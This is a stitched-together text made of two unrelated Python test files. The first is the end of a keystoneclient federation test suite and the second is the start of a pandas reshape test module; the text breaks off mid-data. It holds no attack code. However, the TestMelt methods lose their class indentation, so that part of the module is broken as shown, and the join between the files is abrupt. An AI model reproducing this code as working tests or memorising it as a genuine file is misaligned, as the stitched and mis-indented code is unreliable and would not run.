        url = self.manager.build_url(dict_args_in_out=parameters)
        self.assertEqual('/'.join([base_url, self.collection_key]), url)
    def test_build_url_default_base_url(self):
        # Without base_url the manager nests the collection under the
        # identity provider id.
        identity_provider_id = uuid.uuid4().hex
        parameters = {
            'identity_provider_id': identity_provider_id
        }
        url = self.manager.build_url(dict_args_in_out=parameters)
        self.assertEqual(
            '/'.join([self.manager.base_url, identity_provider_id,
                      self.manager.collection_key]), url)
    def test_create(self):
        """Test creating federation protocol tied to an Identity Provider.
        URL to be tested: PUT /OS-FEDERATION/identity_providers/
        $identity_provider/protocols/$protocol
        """
        request_args = self.new_ref()
        expected = self._transform_to_response(request_args)
        parts = self.build_parts(request_args['identity_provider'],
                                 request_args['protocol_id'])
        self.stub_entity('PUT', entity=expected,
                         parts=parts, status_code=201)
        returned = self.manager.create(**request_args)
        self.assertEqual(expected, returned.to_dict())
        # Only the mapping id is sent in the body (as 'mapping_id').
        request_body = {'mapping_id': request_args['mapping']}
        self.assertEntityRequestBodyIs(request_body)
    def test_get(self):
        """Fetch federation protocol object.
        URL to be tested: GET /OS-FEDERATION/identity_providers/
        $identity_provider/protocols/$protocol
        """
        request_args = self.new_ref()
        expected = self._transform_to_response(request_args)
        parts = self.build_parts(request_args['identity_provider'],
                                 request_args['protocol_id'])
        self.stub_entity('GET', entity=expected,
                         parts=parts, status_code=201)
        returned = self.manager.get(request_args['identity_provider'],
                                    request_args['protocol_id'])
        self.assertIsInstance(returned, self.model)
        self.assertEqual(expected, returned.to_dict())
    def test_delete(self):
        """Delete federation protocol object.
        URL to be tested: DELETE /OS-FEDERATION/identity_providers/
        $identity_provider/protocols/$protocol
        """
        request_args = self.new_ref()
        parts = self.build_parts(request_args['identity_provider'],
                                 request_args['protocol_id'])
        self.stub_entity('DELETE', parts=parts, status_code=204)
        self.manager.delete(request_args['identity_provider'],
                            request_args['protocol_id'])
    def test_list(self):
        """Test listing all federation protocols tied to the Identity Provider.
        URL to be tested: GET /OS-FEDERATION/identity_providers/
        $identity_provider/protocols
        """
        def _ref_protocols():
            # Minimal protocol body as returned by the server.
            return {
                'id': uuid.uuid4().hex,
                'mapping_id': uuid.uuid4().hex
            }
        request_args = self.new_ref()
        expected = [_ref_protocols() for _ in range(3)]
        parts = self.build_parts(request_args['identity_provider'])
        self.stub_entity('GET', parts=parts,
                         entity=expected, status_code=200)
        returned = self.manager.list(request_args['identity_provider'])
        for obj, ref_obj in zip(returned, expected):
            self.assertEqual(obj.to_dict(), ref_obj)
    def test_list_params(self):
        request_args = self.new_ref()
        filter_kwargs = {uuid.uuid4().hex: uuid.uuid4().hex}
        parts = self.build_parts(request_args['identity_provider'])
        # Return HTTP 401 as we don't accept such requests.
        self.stub_entity('GET', parts=parts, status_code=401)
        self.assertRaises(exceptions.Unauthorized,
                          self.manager.list,
                          request_args['identity_provider'],
                          **filter_kwargs)
        # Filters must still have been forwarded as query-string params.
        self.assertQueryStringContains(**filter_kwargs)
    def test_update(self):
        """Test updating federation protocol
        URL to be tested: PATCH /OS-FEDERATION/identity_providers/
        $identity_provider/protocols/$protocol
        """
        request_args = self.new_ref()
        expected = self._transform_to_response(request_args)
        parts = self.build_parts(request_args['identity_provider'],
                                 request_args['protocol_id'])
        self.stub_entity('PATCH', parts=parts,
                         entity=expected, status_code=200)
        returned = self.manager.update(request_args['identity_provider'],
                                       request_args['protocol_id'],
                                       mapping=request_args['mapping'])
        self.assertIsInstance(returned, self.model)
        self.assertEqual(expected, returned.to_dict())
        request_body = {'mapping_id': request_args['mapping']}
        self.assertEntityRequestBodyIs(request_body)
class EntityManagerTests(utils.TestCase):
    """Sanity checks on the abstract federation EntityManager."""
    def test_create_object_expect_fail(self):
        """Directly instantiating the abstract manager raises TypeError."""
        constructor_args = (self.client,)
        self.assertRaises(TypeError, base.EntityManager, *constructor_args)
class FederationProjectTests(utils.TestCase):
    """Tests for listing projects accessible through federation."""
    def setUp(self):
        super(FederationProjectTests, self).setUp()
        self.key = 'project'
        self.collection_key = 'projects'
        self.model = projects.Project
        self.manager = self.client.federation.projects
        self.URL = "%s%s" % (self.TEST_URL, '/OS-FEDERATION/projects')
    def new_ref(self, **kwargs):
        """Return a project reference dict, defaulting missing attributes."""
        kwargs.setdefault('id', uuid.uuid4().hex)
        kwargs.setdefault('domain_id', uuid.uuid4().hex)
        kwargs.setdefault('enabled', True)
        kwargs.setdefault('name', uuid.uuid4().hex)
        return kwargs
    def test_list_accessible_projects(self):
        """GET /OS-FEDERATION/projects returns Project model instances."""
        projects_ref = [self.new_ref(), self.new_ref()]
        # Serve the refs we built; the original built a second, unrelated
        # pair here, leaving projects_ref unused in the stubbed response
        # (inconsistent with FederationDomainTests).
        projects_json = {
            self.collection_key: projects_ref
        }
        self.requests.get(self.URL, json=projects_json)
        returned_list = self.manager.list()
        self.assertEqual(len(projects_ref), len(returned_list))
        for project in returned_list:
            self.assertIsInstance(project, self.model)
class FederationDomainTests(utils.TestCase):
    """Tests for listing domains accessible through federation."""
    def setUp(self):
        super(FederationDomainTests, self).setUp()
        self.key = 'domain'
        self.collection_key = 'domains'
        self.model = domains.Domain
        self.manager = self.client.federation.domains
        self.URL = "%s%s" % (self.TEST_URL, '/OS-FEDERATION/domains')
    def new_ref(self, **kwargs):
        """Build a domain reference, defaulting any missing attribute."""
        defaults = {
            'id': uuid.uuid4().hex,
            'enabled': True,
            'name': uuid.uuid4().hex,
            'description': uuid.uuid4().hex,
        }
        for attr, value in defaults.items():
            kwargs.setdefault(attr, value)
        return kwargs
    def test_list_accessible_domains(self):
        """GET /OS-FEDERATION/domains returns Domain model instances."""
        expected_refs = [self.new_ref(), self.new_ref()]
        self.requests.get(self.URL, json={self.collection_key: expected_refs})
        listed = self.manager.list()
        self.assertEqual(len(expected_refs), len(listed))
        for entry in listed:
            self.assertIsInstance(entry, self.model)
class FederatedTokenTests(utils.TestCase):
    """Checks on AccessInfo built from a V3 federation token fixture."""
    def setUp(self):
        super(FederatedTokenTests, self).setUp()
        # Build a project-scoped federation token with one role attached.
        token = fixture.V3FederationToken()
        token.set_project_scope()
        token.add_role()
        self.federated_token = access.AccessInfo.factory(body=token)
    def test_federated_property_federated_token(self):
        """Check if is_federated property returns expected value."""
        self.assertTrue(self.federated_token.is_federated)
    def test_get_user_domain_name(self):
        """Ensure a federated user's domain name does not exist."""
        self.assertIsNone(self.federated_token.user_domain_name)
    def test_get_user_domain_id(self):
        """Ensure a federated user's domain ID does not exist."""
        self.assertIsNone(self.federated_token.user_domain_id)
| |
# -*- coding: utf-8 -*-
# pylint: disable-msg=W0612,E1101
import pytest
from pandas import DataFrame, Series
import pandas as pd
from numpy import nan
import numpy as np
from pandas.util.testing import assert_frame_equal
from pandas.core.reshape.reshape import (
melt, lreshape, get_dummies, wide_to_long)
import pandas.util.testing as tm
from pandas.compat import range, u
class TestMelt(object):
    def setup_method(self, method):
        # Small 10-row time-series frame plus two binary id columns
        # derived from the sign of columns A and B.
        self.df = tm.makeTimeDataFrame()[:10]
        self.df['id1'] = (self.df['A'] > 0).astype(np.int64)
        self.df['id2'] = (self.df['B'] > 0).astype(np.int64)
        # Custom names exercised by melt(var_name=..., value_name=...).
        self.var_name = 'var'
        self.value_name = 'val'
        # 3x3 frame with a two-level column MultiIndex (names CAP/low),
        # used by the col_level and MultiIndex melt tests.
        self.df1 = pd.DataFrame([[1.067683, -1.110463, 0.20867
                                  ], [-1.321405, 0.368915, -1.055342],
                                 [-0.807333, 0.08298, -0.873361]])
        self.df1.columns = [list('ABC'), list('abc')]
        self.df1.columns.names = ['CAP', 'low']
def test_top_level_method(self):
result = melt(self.df)
assert result.columns.tolist() == ['variable', 'value']
def test_method_signatures(self):
tm.assert_frame_equal(self.df.melt(),
melt(self.df))
tm.assert_frame_equal(self.df.melt(id_vars=['id1', 'id2'],
value_vars=['A', 'B']),
melt(self.df,
id_vars=['id1', 'id2'],
value_vars=['A', 'B']))
tm.assert_frame_equal(self.df.melt(var_name=self.var_name,
value_name=self.value_name),
melt(self.df,
var_name=self.var_name,
value_name=self.value_name))
tm.assert_frame_equal(self.df1.melt(col_level=0),
melt(self.df1, col_level=0))
def test_default_col_names(self):
result = self.df.melt()
assert result.columns.tolist() == ['variable', 'value']
result1 = self.df.melt(id_vars=['id1'])
assert result1.columns.tolist() == ['id1', 'variable', 'value']
result2 = self.df.melt(id_vars=['id1', 'id2'])
assert result2.columns.tolist() == ['id1', 'id2', 'variable', 'value']
def test_value_vars(self):
result3 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A')
assert len(result3) == 10
result4 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'])
expected4 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
'variable': ['A'] * 10 + ['B'] * 10,
'value': (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', 'variable', 'value'])
tm.assert_frame_equal(result4, expected4)
def test_value_vars_types(self):
# GH 15348
expected = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
'variable': ['A'] * 10 + ['B'] * 10,
'value': (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', 'variable', 'value'])
for type_ in (tuple, list, np.array):
result = self.df.melt(id_vars=['id1', 'id2'],
value_vars=type_(('A', 'B')))
tm.assert_frame_equal(result, expected)
def test_vars_work_with_multiindex(self):
expected = DataFrame({
('A', 'a'): self.df1[('A', 'a')],
'CAP': ['B'] * len(self.df1),
'low': ['b'] * len(self.df1),
'value': self.df1[('B', 'b')],
}, columns=[('A', 'a'), 'CAP', 'low', 'value'])
result = self.df1.melt(id_vars=[('A', 'a')], value_vars=[('B', 'b')])
tm.assert_frame_equal(result, expected)
def test_tuple_vars_fail_with_multiindex(self):
# melt should fail with an informative error message if
# the columns have a MultiIndex and a tuple is passed
# for id_vars or value_vars.
tuple_a = ('A', 'a')
list_a = [tuple_a]
tuple_b = ('B', 'b')
list_b = [tuple_b]
for id_vars, value_vars in ((tuple_a, list_b), (list_a, tuple_b),
(tuple_a, tuple_b)):
with tm.assert_raises_regex(ValueError, r'MultiIndex'):
self.df1.melt(id_vars=id_vars, value_vars=value_vars)
def test_custom_var_name(self):
result5 = self.df.melt(var_name=self.var_name)
assert result5.columns.tolist() == ['var', 'value']
result6 = self.df.melt(id_vars=['id1'], var_name=self.var_name)
assert result6.columns.tolist() == ['id1', 'var', 'value']
result7 = self.df.melt(id_vars=['id1', 'id2'], var_name=self.var_name)
assert result7.columns.tolist() == ['id1', 'id2', 'var', 'value']
result8 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A',
var_name=self.var_name)
assert result8.columns.tolist() == ['id1', 'id2', 'var', 'value']
result9 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'],
var_name=self.var_name)
expected9 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
self.var_name: ['A'] * 10 + ['B'] * 10,
'value': (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', self.var_name, 'value'])
tm.assert_frame_equal(result9, expected9)
def test_custom_value_name(self):
result10 = self.df.melt(value_name=self.value_name)
assert result10.columns.tolist() == ['variable', 'val']
result11 = self.df.melt(id_vars=['id1'], value_name=self.value_name)
assert result11.columns.tolist() == ['id1', 'variable', 'val']
result12 = self.df.melt(id_vars=['id1', 'id2'],
value_name=self.value_name)
assert result12.columns.tolist() == ['id1', 'id2', 'variable', 'val']
result13 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A',
value_name=self.value_name)
assert result13.columns.tolist() == ['id1', 'id2', 'variable', 'val']
result14 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'],
value_name=self.value_name)
expected14 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
'variable': ['A'] * 10 + ['B'] * 10,
self.value_name: (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', 'variable',
self.value_name])
tm.assert_frame_equal(result14, expected14)
def test_custom_var_and_value_name(self):
result15 = self.df.melt(var_name=self.var_name,
value_name=self.value_name)
assert result15.columns.tolist() == ['var', 'val']
result16 = self.df.melt(id_vars=['id1'], var_name=self.var_name,
value_name=self.value_name)
assert result16.columns.tolist() == ['id1', 'var', 'val']
result17 = self.df.melt(id_vars=['id1', 'id2'],
var_name=self.var_name,
value_name=self.value_name)
assert result17.columns.tolist() == ['id1', 'id2', 'var', 'val']
result18 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A',
var_name=self.var_name,
value_name=self.value_name)
assert result18.columns.tolist() == ['id1', 'id2', 'var', 'val']
result19 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'],
var_name=self.var_name,
value_name=self.value_name)
expected19 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
self.var_name: ['A'] * 10 + ['B'] * 10,
self.value_name: (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', self.var_name,
self.value_name])
tm.assert_frame_equal(result19, expected19)
df20 = self.df.copy()
df20.columns.name = 'foo'
result20 = df20.melt()
assert result20.columns.tolist() == ['foo', 'value']
def test_col_level(self):
res1 = self.df1.melt(col_level=0)
res2 = self.df1.melt(col_level='CAP')
assert res1.columns.tolist() == ['CAP', 'value']
assert res2.columns.tolist() == ['CAP', 'value']
def test_multiindex(self):
res = self.df1.melt()
assert res.columns.tolist() == ['CAP', 'low', 'value']
class TestGetDummies(object):
    """Tests for get_dummies: basic encoding, NaN handling (dummy_na),
    prefixes/separators, drop_first, and dtype preservation.

    The `sparse` class attribute is flipped to True by the
    TestGetDummiesSparse subclass to re-run every test with sparse output.
    """
    sparse = False
    def setup_method(self, method):
        self.df = DataFrame({'A': ['a', 'b', 'a'],
                             'B': ['b', 'b', 'c'],
                             'C': [1, 2, 3]})
    def test_basic(self):
        s_list = list('abc')
        s_series = Series(s_list)
        s_series_index = Series(s_list, list('ABC'))
        expected = DataFrame({'a': {0: 1,
                                    1: 0,
                                    2: 0},
                              'b': {0: 0,
                                    1: 1,
                                    2: 0},
                              'c': {0: 0,
                                    1: 0,
                                    2: 1}}, dtype=np.uint8)
        assert_frame_equal(get_dummies(s_list, sparse=self.sparse), expected)
        assert_frame_equal(get_dummies(s_series, sparse=self.sparse), expected)
        # the input Series' index is carried through to the result
        expected.index = list('ABC')
        assert_frame_equal(
            get_dummies(s_series_index, sparse=self.sparse), expected)
    def test_basic_types(self):
        # GH 10531
        s_list = list('abc')
        s_series = Series(s_list)
        s_df = DataFrame({'a': [0, 1, 0, 1, 2],
                          'b': ['A', 'A', 'B', 'C', 'C'],
                          'c': [2, 3, 3, 3, 2]})
        expected = DataFrame({'a': [1, 0, 0],
                              'b': [0, 1, 0],
                              'c': [0, 0, 1]},
                             dtype='uint8',
                             columns=list('abc'))
        if not self.sparse:
            compare = tm.assert_frame_equal
        else:
            expected = expected.to_sparse(fill_value=0, kind='integer')
            compare = tm.assert_sp_frame_equal
        result = get_dummies(s_list, sparse=self.sparse)
        compare(result, expected)
        result = get_dummies(s_series, sparse=self.sparse)
        compare(result, expected)
        result = get_dummies(s_df, sparse=self.sparse, columns=s_df.columns)
        tm.assert_series_equal(result.get_dtype_counts(),
                               Series({'uint8': 8}))
        result = get_dummies(s_df, sparse=self.sparse, columns=['a'])
        expected = Series({'uint8': 3, 'int64': 1, 'object': 1}).sort_values()
        tm.assert_series_equal(result.get_dtype_counts().sort_values(),
                               expected)
    def test_just_na(self):
        # NaN-only input with dummy_na=False yields an empty frame,
        # but the original index must be preserved
        just_na_list = [np.nan]
        just_na_series = Series(just_na_list)
        just_na_series_index = Series(just_na_list, index=['A'])
        res_list = get_dummies(just_na_list, sparse=self.sparse)
        res_series = get_dummies(just_na_series, sparse=self.sparse)
        res_series_index = get_dummies(just_na_series_index,
                                       sparse=self.sparse)
        assert res_list.empty
        assert res_series.empty
        assert res_series_index.empty
        assert res_list.index.tolist() == [0]
        assert res_series.index.tolist() == [0]
        assert res_series_index.index.tolist() == ['A']
    def test_include_na(self):
        s = ['a', 'b', np.nan]
        res = get_dummies(s, sparse=self.sparse)
        exp = DataFrame({'a': {0: 1, 1: 0, 2: 0},
                         'b': {0: 0, 1: 1, 2: 0}}, dtype=np.uint8)
        assert_frame_equal(res, exp)
        # Sparse dataframes do not allow nan labelled columns, see #GH8822
        res_na = get_dummies(s, dummy_na=True, sparse=self.sparse)
        exp_na = DataFrame({nan: {0: 0, 1: 0, 2: 1},
                            'a': {0: 1, 1: 0, 2: 0},
                            'b': {0: 0, 1: 1, 2: 0}},
                           dtype=np.uint8)
        exp_na = exp_na.reindex_axis(['a', 'b', nan], 1)
        # hack (NaN handling in assert_index_equal)
        exp_na.columns = res_na.columns
        assert_frame_equal(res_na, exp_na)
        res_just_na = get_dummies([nan], dummy_na=True, sparse=self.sparse)
        exp_just_na = DataFrame(Series(1, index=[0]), columns=[nan],
                                dtype=np.uint8)
        tm.assert_numpy_array_equal(res_just_na.values, exp_just_na.values)
    def test_unicode(self
                     ):  # See GH 6885 - get_dummies chokes on unicode values
        import unicodedata
        e = 'e'
        eacute = unicodedata.lookup('LATIN SMALL LETTER E WITH ACUTE')
        s = [e, eacute, eacute]
        res = get_dummies(s, prefix='letter', sparse=self.sparse)
        exp = DataFrame({'letter_e': {0: 1,
                                      1: 0,
                                      2: 0},
                         u('letter_%s') % eacute: {0: 0,
                                                   1: 1,
                                                   2: 1}},
                        dtype=np.uint8)
        assert_frame_equal(res, exp)
    def test_dataframe_dummies_all_obj(self):
        df = self.df[['A', 'B']]
        result = get_dummies(df, sparse=self.sparse)
        expected = DataFrame({'A_a': [1, 0, 1],
                              'A_b': [0, 1, 0],
                              'B_b': [1, 1, 0],
                              'B_c': [0, 0, 1]}, dtype=np.uint8)
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_mix_default(self):
        # non-object columns pass through untouched, dummies are appended
        df = self.df
        result = get_dummies(df, sparse=self.sparse)
        expected = DataFrame({'C': [1, 2, 3],
                              'A_a': [1, 0, 1],
                              'A_b': [0, 1, 0],
                              'B_b': [1, 1, 0],
                              'B_c': [0, 0, 1]})
        cols = ['A_a', 'A_b', 'B_b', 'B_c']
        expected[cols] = expected[cols].astype(np.uint8)
        expected = expected[['C', 'A_a', 'A_b', 'B_b', 'B_c']]
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_prefix_list(self):
        prefixes = ['from_A', 'from_B']
        df = DataFrame({'A': ['a', 'b', 'a'],
                        'B': ['b', 'b', 'c'],
                        'C': [1, 2, 3]})
        result = get_dummies(df, prefix=prefixes, sparse=self.sparse)
        expected = DataFrame({'C': [1, 2, 3],
                              'from_A_a': [1, 0, 1],
                              'from_A_b': [0, 1, 0],
                              'from_B_b': [1, 1, 0],
                              'from_B_c': [0, 0, 1]})
        cols = expected.columns[1:]
        expected[cols] = expected[cols].astype(np.uint8)
        expected = expected[['C', 'from_A_a', 'from_A_b', 'from_B_b',
                             'from_B_c']]
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_prefix_str(self):
        # not that you should do this...
        df = self.df
        result = get_dummies(df, prefix='bad', sparse=self.sparse)
        expected = DataFrame([[1, 1, 0, 1, 0],
                              [2, 0, 1, 1, 0],
                              [3, 1, 0, 0, 1]],
                             columns=['C', 'bad_a', 'bad_b', 'bad_b', 'bad_c'],
                             dtype=np.uint8)
        expected = expected.astype({"C": np.int64})
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_subset(self):
        df = self.df
        result = get_dummies(df, prefix=['from_A'], columns=['A'],
                             sparse=self.sparse)
        expected = DataFrame({'from_A_a': [1, 0, 1],
                              'from_A_b': [0, 1, 0],
                              'B': ['b', 'b', 'c'],
                              'C': [1, 2, 3]})
        cols = ['from_A_a', 'from_A_b']
        expected[cols] = expected[cols].astype(np.uint8)
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_prefix_sep(self):
        # prefix_sep accepts a scalar, a list, or a per-column dict
        df = self.df
        result = get_dummies(df, prefix_sep='..', sparse=self.sparse)
        expected = DataFrame({'C': [1, 2, 3],
                              'A..a': [1, 0, 1],
                              'A..b': [0, 1, 0],
                              'B..b': [1, 1, 0],
                              'B..c': [0, 0, 1]})
        expected = expected[['C', 'A..a', 'A..b', 'B..b', 'B..c']]
        cols = expected.columns[1:]
        expected[cols] = expected[cols].astype(np.uint8)
        assert_frame_equal(result, expected)
        result = get_dummies(df, prefix_sep=['..', '__'], sparse=self.sparse)
        expected = expected.rename(columns={'B..b': 'B__b', 'B..c': 'B__c'})
        assert_frame_equal(result, expected)
        result = get_dummies(df, prefix_sep={'A': '..',
                                             'B': '__'}, sparse=self.sparse)
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_prefix_bad_length(self):
        with pytest.raises(ValueError):
            get_dummies(self.df, prefix=['too few'], sparse=self.sparse)
    def test_dataframe_dummies_prefix_sep_bad_length(self):
        with pytest.raises(ValueError):
            get_dummies(self.df, prefix_sep=['bad'], sparse=self.sparse)
    def test_dataframe_dummies_prefix_dict(self):
        prefixes = {'A': 'from_A', 'B': 'from_B'}
        df = DataFrame({'A': ['a', 'b', 'a'],
                        'B': ['b', 'b', 'c'],
                        'C': [1, 2, 3]})
        result = get_dummies(df, prefix=prefixes, sparse=self.sparse)
        expected = DataFrame({'from_A_a': [1, 0, 1],
                              'from_A_b': [0, 1, 0],
                              'from_B_b': [1, 1, 0],
                              'from_B_c': [0, 0, 1],
                              'C': [1, 2, 3]})
        cols = ['from_A_a', 'from_A_b', 'from_B_b', 'from_B_c']
        expected[cols] = expected[cols].astype(np.uint8)
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_with_na(self):
        df = self.df
        df.loc[3, :] = [np.nan, np.nan, np.nan]
        result = get_dummies(df, dummy_na=True, sparse=self.sparse)
        expected = DataFrame({'C': [1, 2, 3, np.nan],
                              'A_a': [1, 0, 1, 0],
                              'A_b': [0, 1, 0, 0],
                              'A_nan': [0, 0, 0, 1],
                              'B_b': [1, 1, 0, 0],
                              'B_c': [0, 0, 1, 0],
                              'B_nan': [0, 0, 0, 1]})
        cols = ['A_a', 'A_b', 'A_nan', 'B_b', 'B_c', 'B_nan']
        expected[cols] = expected[cols].astype(np.uint8)
        expected = expected[['C', 'A_a', 'A_b', 'A_nan',
                             'B_b', 'B_c', 'B_nan']]
        assert_frame_equal(result, expected)
        result = get_dummies(df, dummy_na=False, sparse=self.sparse)
        expected = expected[['C', 'A_a', 'A_b', 'B_b', 'B_c']]
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_with_categorical(self):
        df = self.df
        df['cat'] = pd.Categorical(['x', 'y', 'y'])
        result = get_dummies(df, sparse=self.sparse)
        expected = DataFrame({'C': [1, 2, 3],
                              'A_a': [1, 0, 1],
                              'A_b': [0, 1, 0],
                              'B_b': [1, 1, 0],
                              'B_c': [0, 0, 1],
                              'cat_x': [1, 0, 0],
                              'cat_y': [0, 1, 1]})
        cols = ['A_a', 'A_b', 'B_b', 'B_c', 'cat_x', 'cat_y']
        expected[cols] = expected[cols].astype(np.uint8)
        expected = expected[['C', 'A_a', 'A_b', 'B_b', 'B_c',
                             'cat_x', 'cat_y']]
        assert_frame_equal(result, expected)
    def test_basic_drop_first(self):
        # GH12402 Add a new parameter `drop_first` to avoid collinearity
        # Basic case
        s_list = list('abc')
        s_series = Series(s_list)
        s_series_index = Series(s_list, list('ABC'))
        expected = DataFrame({'b': {0: 0,
                                    1: 1,
                                    2: 0},
                              'c': {0: 0,
                                    1: 0,
                                    2: 1}}, dtype=np.uint8)
        result = get_dummies(s_list, sparse=self.sparse, drop_first=True)
        assert_frame_equal(result, expected)
        result = get_dummies(s_series, sparse=self.sparse, drop_first=True)
        assert_frame_equal(result, expected)
        expected.index = list('ABC')
        result = get_dummies(s_series_index, sparse=self.sparse,
                             drop_first=True)
        assert_frame_equal(result, expected)
    def test_basic_drop_first_one_level(self):
        # Test the case that categorical variable only has one level.
        s_list = list('aaa')
        s_series = Series(s_list)
        s_series_index = Series(s_list, list('ABC'))
        expected = DataFrame(index=np.arange(3))
        result = get_dummies(s_list, sparse=self.sparse, drop_first=True)
        assert_frame_equal(result, expected)
        result = get_dummies(s_series, sparse=self.sparse, drop_first=True)
        assert_frame_equal(result, expected)
        expected = DataFrame(index=list('ABC'))
        result = get_dummies(s_series_index, sparse=self.sparse,
                             drop_first=True)
        assert_frame_equal(result, expected)
    def test_basic_drop_first_NA(self):
        # Test NA hadling together with drop_first
        s_NA = ['a', 'b', np.nan]
        res = get_dummies(s_NA, sparse=self.sparse, drop_first=True)
        exp = DataFrame({'b': {0: 0,
                               1: 1,
                               2: 0}}, dtype=np.uint8)
        assert_frame_equal(res, exp)
        res_na = get_dummies(s_NA, dummy_na=True, sparse=self.sparse,
                             drop_first=True)
        exp_na = DataFrame({'b': {0: 0,
                                  1: 1,
                                  2: 0},
                            nan: {0: 0,
                                  1: 0,
                                  2: 1}}, dtype=np.uint8).reindex_axis(
            ['b', nan], 1)
        assert_frame_equal(res_na, exp_na)
        res_just_na = get_dummies([nan], dummy_na=True, sparse=self.sparse,
                                  drop_first=True)
        exp_just_na = DataFrame(index=np.arange(1))
        assert_frame_equal(res_just_na, exp_just_na)
    def test_dataframe_dummies_drop_first(self):
        df = self.df[['A', 'B']]
        result = get_dummies(df, sparse=self.sparse, drop_first=True)
        expected = DataFrame({'A_b': [0, 1, 0],
                              'B_c': [0, 0, 1]}, dtype=np.uint8)
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_drop_first_with_categorical(self):
        df = self.df
        df['cat'] = pd.Categorical(['x', 'y', 'y'])
        result = get_dummies(df, sparse=self.sparse, drop_first=True)
        expected = DataFrame({'C': [1, 2, 3],
                              'A_b': [0, 1, 0],
                              'B_c': [0, 0, 1],
                              'cat_y': [0, 1, 1]})
        cols = ['A_b', 'B_c', 'cat_y']
        expected[cols] = expected[cols].astype(np.uint8)
        expected = expected[['C', 'A_b', 'B_c', 'cat_y']]
        assert_frame_equal(result, expected)
    def test_dataframe_dummies_drop_first_with_na(self):
        df = self.df
        df.loc[3, :] = [np.nan, np.nan, np.nan]
        result = get_dummies(df, dummy_na=True, sparse=self.sparse,
                             drop_first=True)
        expected = DataFrame({'C': [1, 2, 3, np.nan],
                              'A_b': [0, 1, 0, 0],
                              'A_nan': [0, 0, 0, 1],
                              'B_c': [0, 0, 1, 0],
                              'B_nan': [0, 0, 0, 1]})
        cols = ['A_b', 'A_nan', 'B_c', 'B_nan']
        expected[cols] = expected[cols].astype(np.uint8)
        expected = expected[['C', 'A_b', 'A_nan', 'B_c', 'B_nan']]
        assert_frame_equal(result, expected)
        result = get_dummies(df, dummy_na=False, sparse=self.sparse,
                             drop_first=True)
        expected = expected[['C', 'A_b', 'B_c']]
        assert_frame_equal(result, expected)
    def test_int_int(self):
        data = Series([1, 2, 1])
        result = pd.get_dummies(data)
        expected = DataFrame([[1, 0], [0, 1], [1, 0]], columns=[1, 2],
                             dtype=np.uint8)
        tm.assert_frame_equal(result, expected)
        data = Series(pd.Categorical(['a', 'b', 'a']))
        result = pd.get_dummies(data)
        expected = DataFrame([[1, 0], [0, 1], [1, 0]],
                             columns=pd.Categorical(['a', 'b']),
                             dtype=np.uint8)
        tm.assert_frame_equal(result, expected)
    def test_int_df(self):
        data = DataFrame(
            {'A': [1, 2, 1],
             'B': pd.Categorical(['a', 'b', 'a']),
             'C': [1, 2, 1],
             'D': [1., 2., 1.]
             }
        )
        columns = ['C', 'D', 'A_1', 'A_2', 'B_a', 'B_b']
        expected = DataFrame([
            [1, 1., 1, 0, 1, 0],
            [2, 2., 0, 1, 0, 1],
            [1, 1., 1, 0, 1, 0]
        ], columns=columns)
        expected[columns[2:]] = expected[columns[2:]].astype(np.uint8)
        result = pd.get_dummies(data, columns=['A', 'B'])
        tm.assert_frame_equal(result, expected)
    def test_dataframe_dummies_preserve_categorical_dtype(self):
        # GH13854
        for ordered in [False, True]:
            cat = pd.Categorical(list("xy"), categories=list("xyz"),
                                 ordered=ordered)
            result = get_dummies(cat)
            data = np.array([[1, 0, 0], [0, 1, 0]], dtype=np.uint8)
            cols = pd.CategoricalIndex(cat.categories,
                                       categories=cat.categories,
                                       ordered=ordered)
            expected = DataFrame(data, columns=cols)
            tm.assert_frame_equal(result, expected)
class TestGetDummiesSparse(TestGetDummies):
    """Re-runs the entire TestGetDummies suite with sparse output enabled."""
    sparse = True
class TestMakeAxisDummies(object):
    """Tests for the internal make_axis_dummies helper."""
    def test_preserve_categorical_dtype(self):
        # GH13854: categorical index levels must survive as the result columns
        for ordered in [False, True]:
            cidx = pd.CategoricalIndex(list("xyz"), ordered=ordered)
            midx = pd.MultiIndex(levels=[['a'], cidx],
                                 labels=[[0, 0], [0, 1]])
            df = DataFrame([[10, 11]], index=midx)
            expected = DataFrame([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                                 index=midx, columns=cidx)
            from pandas.core.reshape.reshape import make_axis_dummies
            result = make_axis_dummies(df)
            tm.assert_frame_equal(result, expected)
            # an identity transform must not change the outcome
            result = make_axis_dummies(df, transform=lambda x: x)
            tm.assert_frame_equal(result, expected)
class TestLreshape(object):
    """Tests for lreshape: wide-to-long reshaping driven by a column-group
    spec, with and without NaN dropping."""
    def test_pairs(self):
        data = {'birthdt': ['08jan2009', '20dec2008', '30dec2008', '21dec2008',
                            '11jan2009'],
                'birthwt': [1766, 3301, 1454, 3139, 4133],
                'id': [101, 102, 103, 104, 105],
                'sex': ['Male', 'Female', 'Female', 'Female', 'Female'],
                'visitdt1': ['11jan2009', '22dec2008', '04jan2009',
